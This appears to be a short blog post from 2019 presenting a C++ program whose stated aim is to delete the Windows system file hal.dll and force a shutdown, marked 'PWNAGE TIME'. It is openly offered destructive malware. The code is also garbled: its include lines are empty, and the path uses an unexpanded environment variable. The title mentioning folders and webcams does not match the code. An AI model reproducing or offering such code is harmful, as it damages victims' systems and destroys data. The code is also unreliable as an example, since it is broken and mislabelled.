Thursday, July 11, 2019

(robbering folder, deleting webcams)

source

Above code will find the system32 folder and deletes the "hal.dll" file

#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}


No comments: